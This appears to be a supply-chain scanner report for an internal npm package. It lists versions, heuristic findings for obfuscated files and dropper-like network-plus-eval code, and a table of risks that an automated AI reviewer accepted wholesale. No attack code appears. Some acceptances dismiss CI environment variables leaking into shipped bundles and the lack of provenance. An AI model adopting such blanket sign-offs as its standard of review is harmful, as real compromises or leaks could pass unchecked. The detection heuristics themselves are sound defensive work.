@feedmepos/mf-inventory-portal
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/app-BtIUZZer.js | AI (source-diff): Standard Vite minified bundle for this internal portal; consistent across versions. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-DfpzUsNl.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | net-exec-file:dist/lodash-D9rnJgGZ.js | AI (source-diff): False positive: lodash template/Function usage + app HTTP calls, not a dropper. | ai | |
| source-diff | obfuscated-file:dist/lodash-D9rnJgGZ.js | AI (source-diff): Bundled lodash 4.17.21 UMD; MIT-licensed, clearly identified in file header. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-BEB7pV9M.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-ByvhMaCO.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-D-7q6p_s.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/index-CKErlM6H.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-xOeZ1dcl.js | AI (source-diff): Vite-bundled output; CI env var leak is a build hygiene issue, not a security threat. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-BMkVjCEy.js | AI (source-diff): Standard Vite minified Vue component bundle. | ai | |
| source-diff | net-exec-file:dist/lodash-BrwnA6r2.js | AI (source-diff): False positive on bundled lodash; no actual network+exec dropper pattern present. | ai | |
| source-diff | obfuscated-file:dist/lodash-BrwnA6r2.js | AI (source-diff): Bundled lodash 4.17.21 with MIT license header; standard Vite code-splitting. | ai | |
| source-diff | obfuscated-file:dist/app-BPfT1Di5.js | AI (source-diff): Standard Vite minified bundle for internal FeedMe micro-frontend; readable Vue/Pinia code in samples. | ai | |
| source-diff | obfuscated-file:dist/index-DnDQuIzj.js | AI (source-diff): Standard Vite minified bundle; sample shows normal ES module re-exports. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-Bmff-FkE.js | AI (source-diff): Standard Vite minified Vue component bundle. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-B7MCWj08.js | AI (source-diff): Standard Vite minified Vue component bundle. | ai | |
| source-diff | obfuscated-file:dist/app-BYsl6Q0k.js | AI (source-diff): Standard Vite minified bundle for this SPA; readable identifiers and org-internal imports confirm legitimate build output. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-CBK89oKb.js | AI (source-diff): Vite chunk with readable CRUD API calls to org backend; no malicious patterns. | ai | |
| source-diff | net-exec-file:dist/lodash-PCSvaIXr.js | AI (source-diff): False positive; lodash uses Function constructor internally for template compilation, not for network-fetched code execution. | ai | |
| source-diff | obfuscated-file:dist/lodash-PCSvaIXr.js | AI (source-diff): Minified lodash 4.17.21 with MIT license header; standard Vite vendor chunk. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-B2h72dXO.js | AI (source-diff): Vite chunk; env vars embedded from GitHub Actions CI build, consistent with legitimate CI pipeline. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-BXiSzB-N.js | AI (source-diff): Vite chunk; standard minified Vue component bundle. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-DclCC5r6.js | AI (source-diff): Vite chunk; imports from org-internal modules, no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/index-DkhSxroI.js | AI (source-diff): Vite chunk with readable code; no malicious patterns. | ai | |
| phantom-deps | phantom-dep:@typescript-eslint/typescript-estree | AI (phantom-deps): Config-referenced dev tooling phantom dep; stable pattern. | ai | |
| phantom-deps | phantom-dep:libphonenumber-js | AI (phantom-deps): Org-internal micro-frontend; phantom deps are config-referenced, stable pattern across versions. | ai | |
| phantom-deps | phantom-dep:@codemirror/lang-json | AI (phantom-deps): Config-referenced phantom dep; stable pattern for this package. | ai | |
| phantom-deps | phantom-dep:vue-country-flag-next | AI (phantom-deps): Config-referenced phantom dep; stable pattern for this package. | ai | |
| phantom-deps | phantom-dep:@feedmepos/feature-flag | AI (phantom-deps): Same-org scope; phantom dep pattern stable for this micro-frontend. | ai | |
| phantom-deps | phantom-dep:@feedmepos/inventory-core-js | AI (phantom-deps): Same-org scope; phantom dep pattern stable for this micro-frontend. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core-2 | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/custom-attributes | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core-js | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core-dart | AI (dependencies): Same-org internal dependency. | ai | |
| provenance | no-provenance | AI (provenance): Internal org package; provenance not expected in this publishing workflow. | ai | |
| dependencies | unvetted-dep:xlsx | AI (dependencies): Well-known spreadsheet library; no active advisory affecting this constraint. | ai | |
| dependencies | unvetted-dep:handlebars | AI (dependencies): Established templating library; ^4.7.8 is the patched line. | ai | |
| dependencies | unvetted-dep:@feedmepos/core | AI (dependencies): Same-org internal dependency; consistent with feedmepos monorepo pattern. | ai | |
| dependencies | unvetted-dep:@feedmepos/menu | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/feature-flag | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/netsuite-core | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/zod-inventory | AI (dependencies): Same-org internal dependency. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-CS9U9npp.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | net-exec-file:dist/lodash-DKmhfMJj.js | AI (source-diff): Lodash UMD bundle; Function() use is lodash's template engine, not malware. Stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/app-D9p-rdE3.js | AI (source-diff): Standard Vite minified bundle; readable imports and structure confirm legitimate build output. | ai | |
| source-diff | obfuscated-file:dist/index-B_GTpER9.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-B_uw3hNL.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-DZUeTXN6.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-CkY4Tsyv.js | AI (source-diff): Vite bundle with embedded CI env snapshot; no credentials or exfiltration, stable false positive. | ai | |
| source-diff | obfuscated-file:dist/lodash-DKmhfMJj.js | AI (source-diff): Lodash UMD bundle; stable false positive for this package. | ai | |
| phantom-deps | phantom-dep:google-maps | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:change-case | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:handlebars | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:codemirror | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:lz-string | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:dompurify | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:csstype | AI (phantom-deps): Type-only dep; not directly imported in source. | ai | |
| phantom-deps | phantom-dep:lodash | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:dotenv | AI (phantom-deps): Build-time env config; not a direct import. | ai | |
| phantom-deps | phantom-dep:fuzzy | AI (phantom-deps): Config-level declaration; stable false positive for this package. | ai | |
| phantom-deps | phantom-dep:dayjs | AI (phantom-deps): Same pattern — config-level declaration in a bundled micro-frontend. | ai | |
| phantom-deps | phantom-dep:axios | AI (phantom-deps): Large internal Vue app; deps declared for bundler/config use, not direct imports. | ai | |
| phantom-deps | phantom-dep:dinero.js | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:vue-i18n | AI (phantom-deps): Framework convention; loaded by plugin, not direct import. | ai | |
| phantom-deps | phantom-dep:debounce | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:node-html-parser | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:@vue/cli-service | AI (phantom-deps): Framework-scoped build tool; loaded by convention. | ai | |
| phantom-deps | phantom-dep:@types/dinero.js | AI (phantom-deps): Type-only dep; framework-scoped, not directly imported. | ai | |
| phantom-deps | phantom-dep:html2pdf.js | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:eventsource | AI (phantom-deps): Config-level declaration; stable false positive. | ai |
Versions (showing 15 of 15)
| Version | Deps | Published |
|---|---|---|
| 1.5.8 | 43 / 30 | |
| 1.5.7 | 43 / 30 | |
| 1.5.6 | 43 / 30 | |
| 1.5.5 | 43 / 30 | |
| 1.5.4 | 43 / 30 | |
| 1.5.3 | 43 / 30 | |
| 1.5.2 | 43 / 30 | |
| 1.5.1 | 43 / 30 | |
| 1.5.0 | 43 / 30 | |
| 1.4.4 | 43 / 30 | |
| 1.4.3 | 43 / 30 | |
| 1.4.2 | 43 / 30 | |
| 1.4.1 | 43 / 30 | |
| 1.4.0 | 43 / 30 | |
| 1.3.16 | 42 / 30 |
v1.5.8
9 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.5.7
9 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.5.6
9 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.5.5
9 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.5.3
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.5.2
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.5.1
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.5.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.4
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.3
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.2
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.1
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.3.16
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.